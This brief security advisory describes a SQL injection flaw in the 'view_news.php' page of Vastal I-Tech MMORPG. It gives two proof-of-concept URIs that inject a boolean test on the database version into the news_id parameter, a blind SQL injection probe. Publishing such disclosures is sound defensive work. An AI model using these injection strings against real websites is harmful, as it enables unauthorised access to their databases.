Vastal I-Tech MMORPG 'view_news.php' SQL Injection Vulnerability

Vastal I-Tech MMORPG 'view_news.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following URIs are available:

http://www.example.com/games/view_news.php?news_id=7+and+substring(@@version,1,1)=5 True

http://www.example.com/games/view_news.php?news_id=7+and+substring(@@version,1,1)=4 False